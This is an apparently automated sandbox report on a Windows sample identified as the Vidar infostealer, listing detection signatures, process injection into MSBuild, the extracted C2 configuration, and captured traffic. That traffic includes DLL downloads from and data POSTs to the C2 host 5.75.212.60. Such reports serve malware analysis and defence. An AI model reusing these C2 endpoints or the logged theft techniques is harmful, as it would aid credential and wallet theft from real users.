Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1482751
MD5:4ea39e58d5185ea13c816062f97e001d
SHA1:4835b4fce547469ea200fc05f9bdfcfdc7572469
SHA256:1193d78ae12a46941717ff875f19ab33ce9f51f9c4ca3ef3b125abbc37560d62
Tags:exe
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Searches for specific processes (likely to inject)
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 7116 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 4EA39E58D5185EA13C816062F97E001D)
    • MSBuild.exe (PID: 8 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 6440 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 6388 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 6512 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • WerFault.exe (PID: 2648 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6512 -s 2812 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199747278259"], "Botnet": "cb71d89d3eecac4c03c1698bbe16d6d2"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1692402449.0000000003A10000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000000.00000002.1691045839.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000000.00000002.1692402449.00000000045A6000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000000.00000002.1692402449.00000000039E3000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.4579110.3.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
4.2.MSBuild.exe.400000.1.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.2.file.exe.39e31c0.4.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.2.file.exe.3a109f0.6.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.2.file.exe.4579110.3.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

                        System Summary

Source: Network Connection | Author: Kiran kumar s, oscd.community: Data: DestinationIp: 23.192.247.89, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 6512, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                        No Snort rule has matched
Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
2024-07-26T03:17:58.166553+0200 | 2044247 | 443 | 49734 | TCP | Malware Command and Control Activity Detected
2024-07-26T03:18:12.224592+0200 | 2028765 | 49750 | 443 | TCP | Unknown Traffic
2024-07-26T03:18:10.501096+0200 | 2028765 | 49747 | 443 | TCP | Unknown Traffic
2024-07-26T03:18:01.301744+0200 | 2028765 | 49737 | 443 | TCP | Unknown Traffic
2024-07-26T03:18:19.621041+0200 | 2028765 | 49754 | 443 | TCP | Unknown Traffic
2024-07-26T03:18:47.150687+0200 | 2022930 | 443 | 49765 | TCP | A Network Trojan was detected
2024-07-26T03:17:53.826668+0200 | 2028765 | 49731 | 443 | TCP | Unknown Traffic
2024-07-26T03:17:59.522089+0200 | 2051831 | 443 | 49735 | TCP | Malware Command and Control Activity Detected
2024-07-26T03:18:00.297595+0200 | 2028765 | 49736 | 443 | TCP | Unknown Traffic
2024-07-26T03:18:04.383083+0200 | 2028765 | 49738 | 443 | TCP | Unknown Traffic
2024-07-26T03:18:09.045746+0200 | 2022930 | 443 | 49742 | TCP | A Network Trojan was detected
2024-07-26T03:17:59.521867+0200 | 2049087 | 49735 | 443 | TCP | A Network Trojan was detected
2024-07-26T03:18:16.550114+0200 | 2028765 | 49753 | 443 | TCP | Unknown Traffic
2024-07-26T03:17:58.862094+0200 | 2028765 | 49735 | 443 | TCP | Unknown Traffic
2024-07-26T03:18:27.420564+0200 | 2028765 | 49759 | 443 | TCP | Unknown Traffic
2024-07-26T03:17:57.520605+0200 | 2028765 | 49734 | 443 | TCP | Unknown Traffic
2024-07-26T03:18:28.739936+0200 | 2028765 | 49760 | 443 | TCP | Unknown Traffic
2024-07-26T03:18:25.674397+0200 | 2028765 | 49758 | 443 | TCP | Unknown Traffic
2024-07-26T03:17:54.918982+0200 | 2028765 | 49732 | 443 | TCP | Unknown Traffic
2024-07-26T03:18:06.522290+0200 | 2028765 | 49740 | 443 | TCP | Unknown Traffic
2024-07-26T03:18:22.203919+0200 | 2028765 | 49756 | 443 | TCP | Unknown Traffic
2024-07-26T03:18:13.800595+0200 | 2028765 | 49751 | 443 | TCP | Unknown Traffic
2024-07-26T03:18:23.573758+0200 | 2028765 | 49757 | 443 | TCP | Unknown Traffic
2024-07-26T03:18:08.725191+0200 | 2028765 | 49743 | 443 | TCP | Unknown Traffic
2024-07-26T03:17:56.842971+0200 | 2049087 | 49733 | 443 | TCP | A Network Trojan was detected
2024-07-26T03:18:15.242730+0200 | 2028765 | 49752 | 443 | TCP | Unknown Traffic
2024-07-26T03:17:56.215113+0200 | 2028765 | 49733 | 443 | TCP | Unknown Traffic
2024-07-26T03:18:05.490210+0200 | 2028765 | 49739 | 443 | TCP | Unknown Traffic
2024-07-26T03:18:07.652390+0200 | 2028765 | 49741 | 443 | TCP | Unknown Traffic
2024-07-26T03:18:11.361781+0200 | 2011803 | 443 | 49747 | TCP | Executable code was detected
2024-07-26T03:18:20.847588+0200 | 2028765 | 49755 | 443 | TCP | Unknown Traffic
2024-07-26T03:18:03.325570+0200 | 2011803 | 443 | 49737 | TCP | Executable code was detected

                        AV Detection

Source: https://5.75.212.60/sqls.dll | Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199747278259/badges | Avira URL Cloud: Label: malware
Source: https://5.75.212.60/- | Avira URL Cloud: Label: malware
Source: https://5.75.212.60/A | Avira URL Cloud: Label: malware
Source: https://t.me/armad2a | Avira URL Cloud: Label: malware
Source: https://5.75.212.60/softokn3.dllq | Avira URL Cloud: Label: malware
Source: https://5.75.212.60/B | Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199747278259 | Avira URL Cloud: Label: malware
Source: https://5.75.212.60/o | Avira URL Cloud: Label: malware
Source: https://5.75.212.60/nss3.dllQ | Avira URL Cloud: Label: malware
Source: https://5.75.212.60/softokn3.dll | Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199747278259/inventory/ | Avira URL Cloud: Label: malware
Source: https://5.75.212.60/freebl3.dllO | Avira URL Cloud: Label: malware
Source: https://5.75.212.60/mozglue.dll | Avira URL Cloud: Label: malware
Source: https://5.75.212.60/ | Avira URL Cloud: Label: malware
Source: https://5.75.212.60/freebl3.dll | Avira URL Cloud: Label: malware
Source: https://5.75.212.60/nss3.dll | Avira URL Cloud: Label: malware
Source: https://5.75.212.60/msvcp140.dll | Avira URL Cloud: Label: malware
Source: 00000000.00000002.1692402449.0000000003A10000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199747278259"], "Botnet": "cb71d89d3eecac4c03c1698bbe16d6d2"}
Source: arpdabl.zapto.org | Virustotal: Detection: 11%
Source: https://5.75.212.60/sqls.dll | Virustotal: Detection: 11%
Source: http://arpdabl.zapto.org/q | Virustotal: Detection: 10%
Source: https://5.75.212.60/- | Virustotal: Detection: 11%
Source: file.exe | ReversingLabs: Detection: 32%
Source: file.exe | Virustotal: Detection: 24%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00406D50 CryptUnprotectData,LocalAlloc,LocalFree,4_2_00406D50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00406CD0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,4_2_00406CD0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00410DF0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,4_2_00410DF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00408980 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,PK11_FreeSlot,lstrcatA,PK11_FreeSlot,lstrcatA,4_2_00408980
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C576C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,4_2_6C576C80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6CA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,4_2_6C6CA9A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6C4440 PK11_PrivDecrypt,4_2_6C6C4440
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C694420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,4_2_6C694420
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6C44C0 PK11_PubEncrypt,4_2_6C6C44C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C7125B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,4_2_6C7125B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6A8670 PK11_ExportEncryptedPrivKeyInfo,4_2_6C6A8670
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6CA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,4_2_6C6CA650
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6AE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,4_2_6C6AE6E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6EA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,4_2_6C6EA730
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.75.212.60:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2383501124.000000006C5DD000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.4.dr
                        Source: Binary string: freebl3.pdb source: MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
                        Source: Binary string: freebl3.pdbp source: MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
                        Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.dr
                        Source: Binary string: supergamesoft.pdb( source: file.exe
                        Source: Binary string: PE.pdbH] source: file.exe, 00000000.00000002.1705915663.0000000005400000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: supergamesoft.pdb source: file.exe
                        Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\SWxnr.pdb source: file.exe, 00000000.00000002.1692402449.0000000003F76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.000000000446A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1706153820.0000000005533000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: softokn3.pdb@ source: MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000004.00000002.2372726063.0000000038643000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.4.dr
                        Source: Binary string: PE.pdb source: file.exe, 00000000.00000002.1705915663.0000000005400000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000004.00000002.2366512276.000000002C765000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.4.dr
                        Source: Binary string: nss3.pdb source: MSBuild.exe, 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.dr
                        Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2383501124.000000006C5DD000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.4.dr
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359423972.00000000203F8000.00000002.00001000.00020000.00000000.sdmp
                        Source: Binary string: softokn3.pdb source: MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00401110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00401110
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004099F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,4_2_004099F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040A2C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,4_2_0040A2C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004156C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_004156C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040C2E0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0040C2E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00415EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00415EA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00414F80 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,4_2_00414F80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040B390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0040B390
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00409D40 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00409D40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00415A70 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,4_2_00415A70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040AAB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,4_2_0040AAB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004153C0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,4_2_004153C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                        Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_059BD4D0

                        Networking

                        Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199747278259
                        Source: global traffic HTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
                        Source: Joe Sandbox View IP Address: 23.192.247.89 23.192.247.89
                        Source: Joe Sandbox View ASN Name: AKAMAI-ASUS AKAMAI-ASUS
                        Source: Joe Sandbox View JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                        Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIJDGCAEBFIIECAKFHIJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 279 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFCFBFBFBKFIDHJKFCA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBKECFIIEHCFHIECAFBA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 6713 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: GET /sqls.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHDGCGIDAKEBKECAFIEH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 4677 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKJDBAAAEHIEGCAKFHCG User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 1529 Connection: Keep-Alive Cache-Control: no-cache
